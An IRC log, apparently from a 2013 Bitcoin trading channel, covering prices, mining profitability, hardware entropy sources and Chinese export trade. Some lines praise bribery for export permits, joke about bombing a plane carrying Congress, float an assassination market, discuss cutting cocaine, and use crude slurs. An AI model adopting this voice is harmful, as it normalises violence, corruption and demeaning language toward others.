23:24:19 <dub> he should fartscroll.js it Oct 23 23:24:21 <pankkake> could a vacuum tube be used as an entropy source? Oct 23 23:25:40 <mircea_popescu> pankkake that's basically avalanche Oct 23 23:26:07 <pankkake> ok. interesting Oct 23 23:26:34 <mircea_popescu> basically you put a diode into backwards mode and count the electrons that make it past the barrier Oct 23 23:26:52 <b0n1> is it profitable trading gold in china? Oct 23 23:27:12 <b0n1> meaning to ship it out and sell it on for example european market Oct 23 23:27:24 <b0n1> anyone a source or a clue? Oct 23 23:27:33 <pankkake> I like vacuum tubes for the looks basically :p I'd buy that kind of random number generator Oct 23 23:27:44 <mircea_popescu> b0n1 no. china is a net importer, and because of govt pressure consumer gold is even more expensive Oct 23 23:27:47 <mircea_popescu> go the other way. Oct 23 23:28:22 <pankkake> don't you have to smugle it? or it's india Oct 23 23:28:36 <assbot> [MPEX] [S.MPOE] 13660 @ 0.00084429 = 11.533 BTC [+] {4} Oct 23 23:28:40 <topace> do the coinabul peeps every lurk on irc these days ? Oct 23 23:28:56 <mircea_popescu> coingenuity Oct 23 23:29:01 <nubbins`> pankkake: plus you could be all badass walking into the music store Oct 23 23:29:06 <nubbins`> "yeah, i need some tubes" Oct 23 23:29:09 <nubbins`> "oh, for your amp?" Oct 23 23:29:10 <b0n1> what is a good chinese commodity for taking out and selling elsewhere more expensive Oct 23 23:29:17 <mircea_popescu> b0n1 women. Oct 23 23:29:18 <b0n1> jade? is there actually a market for jade in europe? Oct 23 23:29:22 <b0n1> lal mircea_popescu Oct 23 23:29:38 <mircea_popescu> also, tshirts, electronic appliances of all kinds, small plastic toys Oct 23 23:29:49 <mircea_popescu> as well as 90% of all the items you have seen today. Oct 23 23:29:56 <nubbins`> chinese t-shirts Oct 23 23:30:17 <mod6> pankkake: seems like india has import controls, something like 15% tax on gold import Oct 23 23:30:46 <b0n1> well but there are certainly high market entry barriers, right? Maybe you need licences that are difficult to get? Oct 23 23:31:30 <mircea_popescu> basically you need to sign an agreement that if you steal their money they'll kill you with knives. Oct 23 23:31:43 <mircea_popescu> think of dealing with the mob, it's how china handles its export business. Oct 23 23:31:43 <pankkake> nubbins`: exactly, and I already have tubes for my amp anyway ;) Oct 23 23:32:21 <nubbins`> i'm picturing a Hiwatt with a built-in RNG Oct 23 23:32:58 <mircea_popescu> but speaking of gold, anyone saw the 2mn oz paper sale on the 11th ? Oct 23 23:33:04 <mod6> yeah Oct 23 23:33:14 <nubbins`> "5-level eq, all tubes, sub-harmonic generator, and here's a usb port" Oct 23 23:33:14 <mircea_popescu> day's lol it was. Oct 23 23:34:52 <coingenuity> mircea_popescu: hm? Oct 23 23:34:53 <coingenuity> ah Oct 23 23:35:35 <b0n1> do you have to pay tax on gold in china? Oct 23 23:35:46 <coingenuity> b0n1: you can't import gold to china Oct 23 23:35:54 <b0n1> export Oct 23 23:35:59 <b0n1> no import Oct 23 23:36:05 <coingenuity> you pay your 'tax' in the form of price-fixes by the government, which is the only authority allowed to sell/buy Oct 23 23:36:08 <coingenuity> you cant export either Oct 23 23:36:21 <coingenuity> bank of china is the only one allowed Oct 23 23:36:29 <b0n1> black market? Oct 23 23:36:30 <coingenuity> you can bribe them and get an export authorization, or so i hear Oct 23 23:36:51 <b0n1> shadow banking system? Oct 23 23:36:57 <mircea_popescu> this dude is cute. Oct 23 23:37:18 <coingenuity> whats good mircea_popescu :) Oct 23 23:37:22 <mircea_popescu> yes, all hail b0n1, the new black gold market czar of china Oct 23 23:37:33 <b0n1> :) Oct 23 23:37:39 <mircea_popescu> they'll shoot you dood. Oct 23 23:37:57 <coingenuity> ^ Oct 23 23:38:00 <mircea_popescu> but otherwise, china buys 100-150 tons a month. thanks to the jpm&co keeping the price low with their derivative trades, Oct 23 23:38:09 <coingenuity> heh Oct 23 23:38:12 <coingenuity> yeah, the gov buys a ton Oct 23 23:38:14 <b0n1> coingenuity, is it difficult to get the export authorization? Oct 23 23:38:22 <coingenuity> b0n1: i assume its nearly impossible Oct 23 23:38:39 <mircea_popescu> start by getting the job of chinese foreign trade minister Oct 23 23:38:41 <mircea_popescu> then it;'s easy. Oct 23 23:38:53 <coingenuity> ^ Oct 23 23:39:19 <b0n1> :) maybe i am Oct 23 23:39:32 <b0n1> haha Oct 23 23:39:32 <mircea_popescu> on the internet every dog is the emperor of china. Oct 23 23:39:38 <coingenuity> lol Oct 23 23:39:49 <b0n1> coingenuity, what do you think of jade? Oct 23 23:40:06 <coingenuity> b0n1: no opinion Oct 23 23:40:24 <b0n1> or as mircea_popescu said any textile stuff. you could just go to a trading company that ship the stuff always straight to europe Oct 23 23:40:54 <nubbins`> b0n1: curious to know what you're getting at here Oct 23 23:40:57 <mircea_popescu> yes yes. if you have a good opportunity they'll provide you goods. learn chinese, go hang out there fgor a year. it's a living. Oct 23 23:41:18 <mircea_popescu> not quite as good a living as it was in 1993, but anyway. Oct 23 23:42:50 <assbot> [HAVELOCK] [AM100] 35 @ 0.0057 = 0.1995 BTC [-] Oct 23 23:43:01 <b0n1> nubbins`, maybe some cool sources to read a bit about that Oct 23 23:43:24 <b0n1> good forums or stuff... cant find any good source Oct 23 23:44:12 <nubbins`> i meant, why are you so interested in exporting a good from chins Oct 23 23:44:15 <nubbins`> uh. china Oct 23 23:44:47 <nubbins`> !ticker Oct 23 23:44:48 <assbot> I don't give a shit who saw what and who did what or who did who. Oct 23 23:44:52 <nubbins`> hm Oct 23 23:45:05 <nubbins`> ;;ticker Oct 23 23:45:06 <gribble> MtGox BTCUSD ticker | Best bid: 221.80016, Best ask: 223.00000, Bid-ask spread: 1.19984, Last trade: 221.80016, 24 hour volume: 37045.60898872, 24 hour low: 199.60000, 24 hour high: 224.30000, 24 hour vwap: 211.91772 Oct 23 23:45:19 <nubbins`> ^ that's getting a bit ridiculous Oct 23 23:45:59 <b0n1> nubbins`, because i think there is great potential after the opening Oct 23 23:46:36 <mod6> i've been thinking about this chart lately: http://blockchain.info/charts/miners-operating-profit-margin << even after the rally, look where it is. Oct 23 23:47:02 <nubbins`> ha Oct 23 23:47:45 <kakobrekla> http://smpake.com/etc/btc/ Oct 23 23:48:42 <nubbins`> i'm having trouble deciding how greedy to be Oct 23 23:48:48 <mircea_popescu> mod6 which is why the rally. Oct 23 23:49:14 <mod6> kakobrekla: what does the x axis rep? im cornfused. Oct 23 23:49:21 <mircea_popescu> on top of everything else however, like tech obsolesncence etc, the independent miners now also have the problem of dealing with people who mine for political rather than economic reasons Oct 23 23:49:24 <mircea_popescu> it'll be tough Oct 23 23:49:51 <kakobrekla> horizontal is time Oct 23 23:49:55 <nubbins`> 10% attack Oct 23 23:50:08 <mod6> kakobrekla: i can't figure how those numbers are linear though Oct 23 23:50:29 <nubbins`> anyway, the dilemma is that if i sell this stack of btc now, i could lose out on potential gains if the trend continues to rise Oct 23 23:50:36 <kakobrekla> its a copla of years chars since its started to chart Oct 23 23:50:42 <kakobrekla> dayum its been long :\ Oct 23 23:50:48 <nubbins`> but if i sit on them with the expectation that the trend continues, i risk losing out on potential gains as well Oct 23 23:51:03 <nubbins`> and so i'm left trying to decide just how greedy i am Oct 23 23:51:40 <mircea_popescu> lmao. 1st world problems. Oct 23 23:51:45 <nubbins`> i know right? Oct 23 23:52:10 <mod6> oh because { 26.x, 27.x, 28.x, 27.x, 26.x ...} etc Oct 23 23:52:19 <mod6> ok heh Oct 23 23:52:59 <mod6> oh thats the date, not the month. got it. Oct 23 23:53:09 <nubbins`> ah! Oct 23 23:53:17 <nubbins`> well, that makes more sense now Oct 23 23:53:29 <nubbins`> what an odd date format Oct 23 23:53:40 <mircea_popescu> it's not odd, it's european/ Oct 23 23:53:57 <nubbins`> you just said two opposite things Oct 23 23:54:34 <mircea_popescu> inception Oct 23 23:54:56 <mircea_popescu> http://www.thedrinkingrecord.com/2013/10/17/signature-thursday-how-strong-is-yours/ Oct 23 23:54:58 <ozbot> Signature Thursday: How strong is yours? | Bingo Blog Oct 23 23:55:02 <mircea_popescu> im curious how long before judges move to gpg sigs Oct 23 23:55:02 <deadweasel> yes, wake up, the price is actually $33/btc Oct 23 23:56:45 <nubbins`> mircea_popescu: prolly never Oct 23 23:57:02 <mircea_popescu> i dunno, i wouldn't take the judge job w/o gpg sigs. Oct 23 23:57:05 <assbot> [HAVELOCK] [VTX] 8 @ 0.31000087 = 2.48 BTC [-] {2} Oct 23 23:57:28 <nubbins`> well, there are plenty of judges that won't accept emailed documents but will accept faxes Oct 23 23:57:43 <nubbins`> not necessarily the most eager to embrace technology Oct 23 23:58:23 <nubbins`> anyway, i gotta go prep for a zine workshop. peace Oct 23 23:58:35 <mircea_popescu> yeah, but suppose it becomes law tomorrow that should your signature be forged, you're responsible as if you had signed. Oct 23 23:58:42 <nubbins`> heh! Oct 23 23:59:03 <mircea_popescu> part of a larger obama responsibility reform package, that also includes a rule that if your computer is hacked and sends spam, you're fined Oct 23 23:59:31 <mircea_popescu> ten bux an email or something reasonable like that. Oct 23 23:59:56 <mircea_popescu> (half of which going to the party that reports the spam, of course) Oct 24 00:00:11 <nubbins`> http://www.youtube.com/watch?v=urMjGAimtRc Oct 24 00:00:11 <ozbot> Roger Hodgson - Dreamer [Live] - YouTube Oct 24 00:00:19 <nubbins`> and on that note, i'm out Oct 24 00:01:02 <mod6> only a matter of time until a party collects keys and then spams people to generate rev. Oct 24 00:01:09 <assbot> [MPEX] [S.MPOE] 2662 @ 0.00084533 = 2.2503 BTC [+] Oct 24 00:01:13 <mod6> (if that should happen) Oct 24 00:01:41 <mircea_popescu> mod6 how'd that work ? Oct 24 00:01:49 <mod6> <dude> Your Honor, I swear I never sent those emails. <Judge> Sorry son, this spam has your key sig. Oct 24 00:02:05 <mod6> *gavel* Oct 24 00:02:10 <mircea_popescu> a no. Oct 24 00:02:21 <mircea_popescu> most of spam floating about today is traceable to clueless "businesses" Oct 24 00:02:29 <mircea_popescu> that run poorly secured, windows computers on the network Oct 24 00:03:11 <assbot> [HAVELOCK] [AM1] 3 @ 0.57300014 = 1.719 BTC [-] Oct 24 00:03:13 <mircea_popescu> consider : Subject: This Company Announced News Today From: frank@altimayachts.com Oct 24 00:03:33 <mircea_popescu> "Altima Yachts, Inc was founded out of a desire by our founder, Frank Sciortino, to produce the finest cruising yacht possible at a reasonable investment level." Oct 24 00:04:45 <pankkake> so running windows is now a crime in the US? at least government intervention does something positive! Oct 24 00:04:53 <pankkake> at last* Oct 24 00:05:13 <assbot> [MPEX] [S.MPOE] 8087 @ 0.00084594 = 6.8411 BTC [+] {3} Oct 24 00:05:40 <mircea_popescu> ah the sweet day when im tyrant and everyone who ever worked for microsoft is permanently in jail. Oct 24 00:06:14 <assbot> [HAVELOCK] [AM100] 50 @ 0.0055432 = 0.2772 BTC [-] {6} Oct 24 00:06:15 <assbot> [MPEX] [S.MPOE] 1713 @ 0.00084719 = 1.4512 BTC [+] Oct 24 00:10:38 <dub> http://news.vanderbilt.edu/2013/10/device-electricity-silicon-chips/ Oct 24 00:10:39 <ozbot> New device stores electricity on silicon chips | Research News @ Vanderbilt | Vanderbilt Universi Oct 24 00:13:39 <dexX7> http://www.sec.gov/Archives/edgar/data/1579346/000119312513393903/0001193125-13-393903-index.htm < "is this good news?" Oct 24 00:13:51 <dexX7> https://bitcointalk.org/index.php?topic=316872.0 Oct 24 00:13:53 <ozbot> Winklevoss Bitcoin Trust on Bloomberg Oct 24 00:16:36 <mircea_popescu> not much yet. Oct 24 00:17:03 <mircea_popescu> it's been pending listing since summer. Oct 24 00:17:17 <ThickAsThieves> ;;ticker Oct 24 00:17:17 <gribble> MtGox BTCUSD ticker | Best bid: 222.01112, Best ask: 223.79500, Bid-ask spread: 1.78388, Last trade: 222.01110, 24 hour volume: 37508.43892433, 24 hour low: 199.60135, 24 hour high: 224.30000, 24 hour vwap: 212.23333 Oct 24 00:17:26 <ThickAsThieves> ;;bcstats Oct 24 00:17:27 <pgp> mod6: Regarding miner profits, Blockchain.info has not updated it's assumption of Watts/GH in a long time. Latest hardware is at around 10 Watts per GH not 650 Watts. Miners are still making plenty... Oct 24 00:17:28 <gribble> Current Blocks: 265603 | Current Difficulty: 2.677312494824211E8 | Next Difficulty At Block: 266111 | Next Difficulty In: 508 blocks | Next Difficulty In About: 2 days, 8 hours, 26 minutes, and 39 seconds | Next Difficulty Estimate: 380572529.595 | Estimated Percent Change: 42.14722 Oct 24 00:17:46 <ThickAsThieves> ;;estimate Oct 24 00:17:47 <gribble> Next difficulty estimate | 380572529.595 based on data since last change | 433506794.872 based on data for last three days Oct 24 00:18:35 <mircea_popescu> 42 ej Oct 24 00:20:28 <assbot> [HAVELOCK] [AM1] 1 @ 0.61 BTC [+] Oct 24 00:20:36 <mod6> pgp: ah. thx. Oct 24 00:25:33 <assbot> [HAVELOCK] [AM100] 86 @ 0.00571022 = 0.4911 BTC [+] {2} Oct 24 00:25:40 <mircea_popescu> ;;gentime 1000000 Oct 24 00:25:42 <gribble> The average time to generate a block at 1000000.0 Mhps, given difficulty of 267731249.482, is 1 week, 6 days, 7 hours, 25 minutes, and 14 seconds Oct 24 00:26:18 <mircea_popescu> ;;calc 13*24*3.600*10 Oct 24 00:26:18 <gribble> 11232 Oct 24 00:26:34 <mircea_popescu> ;;calc 25 * 220 / 11232 Oct 24 00:26:34 <gribble> 0.489672364672 Oct 24 00:26:47 <mircea_popescu> nah that's broken Oct 24 00:27:41 <mircea_popescu> ;;calc 13*24*10 Oct 24 00:27:42 <gribble> 3120 Oct 24 00:28:10 <mircea_popescu> ;;calc 25 * 220 / 3120 Oct 24 00:28:10 <gribble> 1.76282051282 Oct 24 00:28:27 <mircea_popescu> so yeah, if they pay less than 1.75 dollars / kwh and the gear was free they're making a profit. Oct 24 00:28:36 <assbot> [HAVELOCK] [KCIM] 2 @ 0.25 = 0.5 BTC [+] Oct 24 00:28:37 <benkay> ;;tslb Oct 24 00:28:42 <gribble> Time since last block: 7 minutes and 59 seconds Oct 24 00:31:15 <mod6> so could a hardware device that measures the decay of a certain isotope be contrived to obtain a reliable source of random numbers? and if so, what would be the best isotope to use? Oct 24 00:31:44 <mod6> was looking at http://en.wikipedia.org/wiki/List_of_isotopes_by_half-life in the 10^-3 range... Oct 24 00:32:10 <mircea_popescu> if the gear costs 100k per terahash and it has to be amortised in 6 months however, the cost of electricity would have to be under -7 dollars/kwh or so. Oct 24 00:32:39 <mircea_popescu> mod6 i'll tell you later, in the shape of a future nsa product :D Oct 24 00:33:17 <mod6> :] Oct 24 00:33:20 <dub> it'll be a box with a camera and a turtle in it Oct 24 00:33:40 <assbot> [MPEX] [S.MPOE] 1400 @ 0.00084685 = 1.1856 BTC [-] Oct 24 00:34:00 <mircea_popescu> why a turtle specifically ? Oct 24 00:35:25 <dub> best size vs. longevity I could think of in 8 seconds Oct 24 00:35:33 <dub> some of those little guys last 20 years Oct 24 00:35:44 <dub> big ones longer than us obviously but harder to ug around Oct 24 00:35:47 <dub> lug* Oct 24 00:36:55 <mircea_popescu> http://assets.inhabitat.com/wp-content/blogs.dir/1/files/2013/03/Peanut-Deformed-Turtle-Six-Pack-Ring-1-537x380.jpg Oct 24 00:37:30 <dub> darwin be praised Oct 24 00:37:48 <jurov> <phungus> [18:45:17] a Broker doesn't seem like it would help for listing << why not? it can help you, infact i'm already doing stuff to help namworld with this passthroughs ;) Oct 24 00:38:09 <jurov> *with his passthroughs Oct 24 00:38:45 <assbot> [HAVELOCK] [AM1] 1 @ 0.61269944 BTC [+] Oct 24 00:38:46 <assbot> [HAVELOCK] [AM100] 25 @ 0.005496 = 0.1374 BTC [-] {8} Oct 24 00:39:47 <assbot> [HAVELOCK] [AM100] 746 @ 0.005251 = 3.9172 BTC [-] {32} Oct 24 00:40:47 <assbot> [HAVELOCK] [AM100] 567 @ 0.00503144 = 2.8528 BTC [-] {5} Oct 24 00:41:49 <assbot> [HAVELOCK] [HIM] 83 @ 0.04989408 = 4.1412 BTC [-] {8} Oct 24 00:42:49 <assbot> [HAVELOCK] [VTX] 1 @ 0.31 BTC [-] Oct 24 00:42:57 <kakobrekla> >>"Kakobrekla is the slanderous soul" Oct 24 00:42:59 <kakobrekla> lmao Oct 24 00:43:43 <mircea_popescu> who did you slander this time Oct 24 00:43:51 <assbot> [HAVELOCK] [AM1] 5 @ 0.61275 = 3.0638 BTC [+] Oct 24 00:43:52 <dub> has to be luke Oct 24 00:44:09 <mircea_popescu> could be luke... Oct 24 00:44:22 <kakobrekla> no, its that kiddo. Oct 24 00:44:52 <mircea_popescu> here, i'll trade you : "the writer here has something interesting to say and a few useful ways to explain it, but jesus if trilema hasn't completely fucking spoiled me for elegance and conciseness." Oct 24 00:46:45 <kakobrekla> dunno how to slander that. Oct 24 00:52:03 <mircea_popescu> slander IMMUNITY Oct 24 00:54:27 <ThickAsThieves> <+AssetBot> [Graet.Loan] 2 @ 0.00502000 = 0.01004000 [-] Oct 24 00:54:43 <ThickAsThieves> it's a .01 face value "bond" (loan) Oct 24 00:56:03 <mircea_popescu> the market is never wrong Oct 24 00:56:06 <jurov> "slanderous soul" ... sounds almost poetic Oct 24 01:01:08 <assbot> [HAVELOCK] [AM100] 50 @ 0.00520001 = 0.26 BTC [+] Oct 24 01:02:10 <assbot> [HAVELOCK] [AM100] 23 @ 0.0052 = 0.1196 BTC [-] Oct 24 01:03:10 <assbot> [HAVELOCK] [AM1] 42 @ 0.627069 = 26.3369 BTC [+] {13} Oct 24 01:05:12 <assbot> [HAVELOCK] [AM1] 19 @ 0.57329476 = 10.8926 BTC [-] {8} Oct 24 01:11:18 <assbot> [MPEX] [S.MPOE] 800 @ 0.00084157 = 0.6733 BTC [-] Oct 24 01:12:19 <assbot> [HAVELOCK] [AM100] 500 @ 0.00500001 = 2.5 BTC [-] {4} **** BEGIN LOGGING AT Thu Oct 24 04:59:32 2013 Oct 24 05:02:20 <dub> we should ask mircea_popescu if its ok to be this high Oct 24 05:02:50 <mircea_popescu> if you mean http://bitcoin.sipa.be/speed-lin-ever.png it's damned scary Oct 24 05:03:11 <dub> we may need an angry blog post to bring it down Oct 24 05:04:27 <mircea_popescu> there ain't no bringing this down babeh. Oct 24 05:05:02 <dub> the price, not net speed Oct 24 05:05:06 <assbot> [MPEX] [S.MPOE] 13400 @ 0.00083575 = 11.1991 BTC [+] {2} Oct 24 05:05:19 <pgp> i wish charts like that were plotted against log10... Oct 24 05:05:46 <mircea_popescu> pgp http://bitcoin.sipa.be/speed-small-ever.png Oct 24 05:06:20 <BingoBoingo> This just looks like the same process that started last winter where the new $100 normal was discovered. Maybe we are in for Bitcoin's trek from being the internet's crisp hundred dollar bill to being the crisp 500 euro note. Oct 24 05:07:05 <mircea_popescu> there certainly exists the sufficient cause and backing for it. Oct 24 05:07:40 <KRS1> cool next month i get to start throwing my asic miners away..useless. Oct 24 05:07:56 <mircea_popescu> KRS1 have BingoBoingo over for a bbq Oct 24 05:08:07 <KRS1> I live in Florida near Miami. Oct 24 05:08:11 <KRS1> not far from Miami Oct 24 05:08:24 <dexX7> bitcoin backing / justification for a huge rise = purchased asic hardware, mp? Oct 24 05:08:50 <BingoBoingo> KRS1: That isn't too long of a drive. I just might have to retape my passenger side mirror on before I try returning to the Interstate Highways. Oct 24 05:09:48 <KRS1> jaja Oct 24 05:10:09 <KRS1> A while back i met Aaron the author of BAMT. He lives not far from me. Oct 24 05:10:29 <KRS1> met quite a few people in BTC here. Oct 24 05:10:41 <KRS1> LorenzoMoney..he's cool. Oct 24 05:11:04 <mircea_popescu> dexX7 nope, i've never mined, i still am not mining. Oct 24 05:11:48 <KRS1> like you have a reason to..haha keep doing what you do Oct 24 05:12:51 <mircea_popescu> yeah, we can't all do everything. Oct 24 05:13:47 <KRS1> wouldnt want to..im working for my retirement so i can say FU and earn a few percent in the south caribbean somewhere. Oct 24 05:14:26 <mircea_popescu> anyway, curious if we're in for a rehash of july 2010. (vertical degree of magnitude wall, i think there were two consecutive 400% increases there) Oct 24 05:14:53 <phungus> it, fels the same Oct 24 05:14:55 <phungus> feels Oct 24 05:15:03 <mircea_popescu> it does have a sort of air doesn't it Oct 24 05:15:03 <phungus> I am saying 500 Oct 24 05:15:06 <phungus> then the reset Oct 24 05:15:19 <phungus> maybe that's too high Oct 24 05:15:20 <phungus> I dunno Oct 24 05:15:23 <KRS1> one would think when the btc would be 100% mined to figure that maybe? Oct 24 05:15:43 <KRS1> year or two before supply runs out? Oct 24 05:16:17 <assbot> [MPEX] [S.MPOE] 8208 @ 0.00083564 = 6.8589 BTC [-] {2} Oct 24 05:16:27 <KRS1> $266 was fun indeed Oct 24 05:17:08 <nubbins`> i think they were talking about difficulty Oct 24 05:17:37 <KRS1> oh right 2010 Oct 24 05:18:00 <nubbins`> yeah, last pasted link Oct 24 05:18:04 <nubbins`> that's a wild couple of jumps Oct 24 05:18:13 <KRS1> ;;seen chaang-noi Oct 24 05:18:13 <gribble> chaang-noi was last seen in #bitcoin-assets 5 weeks, 5 days, 9 hours, 56 minutes, and 14 seconds ago: <chaang-noi> TOM FORD Oct 24 05:19:20 <assbot> [HAVELOCK] [AM1] 4 @ 0.56200004 = 2.248 BTC [-] {2} Oct 24 05:19:24 <mircea_popescu> nubbins` of course one has to appreciate it was on very narrow base Oct 24 05:19:47 <nubbins`> yeah. two beers will make you the drunkest guy in an empty bar. Oct 24 05:19:50 <mircea_popescu> 7 degrees of magnitude below current levels. Oct 24 05:19:56 <mircea_popescu> right. Oct 24 05:20:21 <assbot> [HAVELOCK] [CFIG] 1 @ 0.1223 BTC [-] Oct 24 05:26:23 <mircea_popescu> KRS1 i dunno about LorenzoMoney, he's been maligning my good name calling me a fascist science writer and stuff Oct 24 05:26:46 <nubbins`> lel Oct 24 05:26:47 <KRS1> damn =/ Oct 24 05:27:06 <KRS1> I met him seemed ok..thats odd. Oct 24 05:27:18 <mircea_popescu> ikr? Oct 24 05:29:01 <KRS1> sorry to hear that Oct 24 05:29:34 <mircea_popescu> KRS1 you realise it's a joke, mostly. Oct 24 05:32:16 <KRS1> oh i missed that ok Oct 24 05:32:24 <KRS1> came out of nowhere Oct 24 05:33:23 <dexX7> ;;calc 1/205 Oct 24 05:33:23 <gribble> 0.00487804878049 Oct 24 05:40:29 <BingoBoingo> I'll just throw out it feels more like January 2013 than silk Road July (and to most people that should mean nothing, don't you cultivate your own personalized WOT's). Oct 24 05:42:03 <dub> wot Oct 24 05:42:51 <KRS1> wut Oct 24 05:43:19 <asciilifeform> for the crypto/information-theory buffs: http://www.loper-os.org/bad-at-entropy/manmach.html Oct 24 05:45:33 <KRS1> Score % Leader Man 3 100.00 Machine 0 0.00 Oct 24 05:45:37 <KRS1> i am teh win Oct 24 05:46:04 <ThickAsThieves> ;;market buy 20000 Oct 24 05:46:05 <gribble> A market order to buy 20000 bitcoins right now would take 5406287.9873 USD and would take the last price up to 493.3530 USD, resulting in an average price of 270.3144 USD/BTC. | Data vintage: 0.0068 seconds Oct 24 05:46:15 <ThickAsThieves> ;;bids 0 Oct 24 05:46:15 <gribble> There are currently 73141057 bitcoins demanded at or over 0.0 USD, worth 14581346.7977 USD in total. | Data vintage: 10.6065 seconds Oct 24 05:49:16 <mircea_popescu> asciilifeform cool beans Oct 24 05:49:25 <mircea_popescu> KRS1 beat it with a score > 100 Oct 24 05:49:37 <asciilifeform> everybody try it on your cat. or wife. or other pets. Oct 24 05:50:05 <TomServo> what's the high score? :) Oct 24 05:50:20 <mircea_popescu> Man 6 85.71 * Machine 1 14.29 < Oct 24 05:50:35 <mike_c> that website can read my mind. super annoying. Oct 24 05:50:35 <mircea_popescu> it's not too hard to beat to shit provided you have infinite memory. Oct 24 05:50:41 <mircea_popescu> you don't, so the computer will eventually win. Oct 24 05:50:56 <mircea_popescu> (as sooner or later you begin forgetting your earlier patterns) Oct 24 05:51:19 <mircea_popescu> basically if you can't score > 50% on 100 rolls you'll never be a card counter in blackjack Oct 24 05:51:34 <asciilifeform> you can cheat by tossing a coin, say. but it's gotta be a perfectly fair coin! Oct 24 05:51:58 <mircea_popescu> anyway, this warrants a write-up Oct 24 05:51:59 <asciilifeform> the point of the exercise was to illustrate a fact. Oct 24 05:52:37 <TomServo> it does that well, I think. Oct 24 06:01:20 <mircea_popescu> sooo, in the latest installment of "libertards are owned by technology", it'd seem the uncompromised obamacare will in fact be delayed after all. because websites are hard. Oct 24 06:03:26 <BingoBoingo> mircea_popescu: But they have a dream team of engineers whose owners won't be named... Oct 24 06:04:03 <assbot> [HAVELOCK] [AM100] 36 @ 0.00477138 = 0.1718 BTC [-] {3} Oct 24 06:04:19 <BingoBoingo> Also managed 55.93% on 100 rolls on Ma vs. Machine Oct 24 06:05:04 <assbot> [HAVELOCK] [AM100] 48 @ 0.00462708 = 0.2221 BTC [-] {3} Oct 24 06:05:05 <assbot> [HAVELOCK] [HIM] 2 @ 0.06989999 = 0.1398 BTC [+] Oct 24 06:06:05 <assbot> [HAVELOCK] [HIM] 4 @ 0.0698 = 0.2792 BTC [-] Oct 24 06:08:07 <assbot> [HAVELOCK] [AM100] 123 @ 0.00442712 = 0.5445 BTC [-] {3} Oct 24 06:09:08 <assbot> [HAVELOCK] [AM100] 105 @ 0.00441 = 0.4631 BTC [-] {3} Oct 24 06:09:45 <nubbins`> 53.19% :( Oct 24 06:12:19 <mircea_popescu> wd. Oct 24 06:12:31 <nubbins`> oh wait. i stopped when i had 100 points Oct 24 06:12:33 <nubbins`> i misread Oct 24 06:14:13 <assbot> [HAVELOCK] [HIM] 33 @ 0.0698 = 2.3034 BTC [-] Oct 24 06:19:45 <mircea_popescu> asciilifeform if you toss a coin you'll get something like 1% over the machine in 1000 tries Oct 24 06:19:54 <mircea_popescu> or w/e, 0.01 in 1mn tries Oct 24 06:20:20 <assbot> [MPEX] [S.MPOE] 21199 @ 0.00083626 = 17.7279 BTC [+] {3} Oct 24 06:21:21 <assbot> [MPEX] [S.MPOE] 9539 @ 0.00083842 = 7.9977 BTC [+] Oct 24 06:21:21 <assbot> [HAVELOCK] [HIM] 2 @ 0.0698 = 0.1396 BTC [-] Oct 24 06:25:09 <mircea_popescu> "October 24, 2013 will bring with it something that has not been heard of since 1921. The entire House and Senate, all of Capitol Hill will close for the funeral of a Representative. However unlike the 1921 Congress Closing, all members are being flown to Florida for the funeral by the United States Air Force." Oct 24 06:25:16 <mircea_popescu> if "terrorists" happen to bomb that plane... Oct 24 06:25:42 <VanCleef> my dad died as a terrorist show some respect Oct 24 06:26:42 <KRS1> haha Oct 24 06:28:07 <BingoBoingo> I'm guessing Bitcoin doesn't have an assassination market yet? Oct 24 06:28:29 <VanCleef> yeh right some fat virgin nerd is going to leave their grandmothers basement to do a hit Oct 24 06:28:29 <Apocalyptic> BingoBoingo, ask DRP Oct 24 06:28:32 <VanCleef> good one Oct 24 06:28:57 <VanCleef> why would they do that when they can smell their computer chair all day Oct 24 06:29:26 <mircea_popescu> http://trilema.com/2013/find-out-just-how-human-your-girlfriend-really-is/ Oct 24 06:29:27 <ozbot> Find out just how human your girlfriend really is* pe Trilema - Un blog de Mircea Popescu. Oct 24 06:29:28 <mircea_popescu> asciilifeform ^ :D Oct 24 06:29:29 <assbot> [HAVELOCK] [AM1] 5 @ 0.56160001 = 2.808 BTC [-] {3} Oct 24 06:30:30 <assbot> [HAVELOCK] [AM100] 100 @ 0.0046 = 0.46 BTC [+] Oct 24 06:34:21 <BingoBoingo> VanCleef Apocalyptic: You never know. Even the fat need exercise sometimes. Look how skinny the coke made DPR when he couldn't sell it. Oct 24 06:34:32 <mircea_popescu> lmao Oct 24 06:34:39 <mircea_popescu> coke doesn't make you skinny, it's practically sugar. Oct 24 06:34:57 <BingoBoingo> mircea_popescu: Not to your metabolism. Oct 24 06:35:14 <VanCleef> i met a crackwhore the other night at a nightclub Oct 24 06:35:24 <VanCleef> its funny when they really look like a crackwhore Oct 24 06:35:35 <assbot> [MPEX] [S.MPOE] 25270 @ 0.00083728 = 21.1581 BTC [-] {3} Oct 24 06:35:43 <mircea_popescu> you know, people who specify CRACKwhore make me thing ladyboys are a lot more popular than i imagine. Oct 24 06:36:03 <VanCleef> very popular Oct 24 06:36:14 <VanCleef> even actual women are starting to look like ladyboys now Oct 24 06:40:33 <mircea_popescu> BingoBoingo no, seriouslys, it's usually sugar cut. at least the upscale stuff. Oct 24 06:41:31 <BingoBoingo> Around here allegedly the contaminant is usually gypsum that was in the way of copper that needed stole. Oct 24 06:41:37 <mircea_popescu> also for that reason crack cocaine != cocaine Oct 24 06:43:38 <KRS1> very different Oct 24 06:45:00 <BingoBoingo> Well, the speed at which you can reach a decent serum concentration generally makes a difference on end effect. Oct 24 06:46:02 <mircea_popescu> that's not the whole story there. crack is significantly more toxic. Oct 24 06:47:34 <BingoBoingo> mircea_popescu: More toxic yes, but mostly from combustion byproducts. The bicarbonates that make the crack a rock generally don't stay very benign when they burn. Oct 24 06:48:18 <mircea_popescu> also from the sudden avalanche of sodium blockers being less well tolerated by the heart Oct 24 06:49:37 <BingoBoingo> Then there's the part where lung tissue tends to atrophy in the presence of cocaine in a way it can't for nicotine since humans generally have a bunch of enzymes ready to break down cholinergics like nicotine, though not so much for cocaine. Oct 24 06:51:43 <BingoBoingo> Nicotine is the odd case in which any non-smoking route of administration can generally get more drug to the brain. For cocaine, the opiates and others the case is usually the opposite. Oct 24 06:51:53 <mircea_popescu> http://cdn2.tauntr.com/sites/default/files/CokeSpoon_Cowboys.jpg Oct 24 06:57:08 <BingoBoingo> /me wonders where MrKlye is for this conversation Oct 24 06:57:29 <nubbins`> i've seen people add heaping spoonfuls of powdered glucosamine to bags of coke Oct 24 06:57:39 <nubbins`> anything white that won't immediately kill you, really Oct 24 06:59:36 <mircea_popescu> glucosamine isn't particularly toxic or anything Oct 24 06:59:51 <mircea_popescu> actually i think you can't even find a "food 